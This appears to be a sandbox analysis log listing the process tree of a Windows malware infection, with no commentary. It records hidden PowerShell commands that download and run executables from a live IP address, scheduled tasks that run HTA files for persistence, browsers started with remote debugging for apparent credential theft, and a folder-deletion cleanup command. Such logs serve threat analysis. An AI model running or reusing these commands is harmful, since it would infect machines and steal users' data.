schtasks /create /tn 0XhcbmanOzW /tr "mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd14fecc40,0x7ffd14fecc4c,0x7ffd14fecc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2364 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3244 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4244,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "jWtzpmatznG" /tr "mshta \"C:\Temp\9undwL0Qa.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\9undwL0Qa.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd14ff46f8,0x7ffd14ff4708,0x7ffd14ff4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE
"C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE"
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3ozmo" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe
"C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe"
C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe
"C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe
"C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe
"C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4932 -ip 4932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 808
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
Network
Files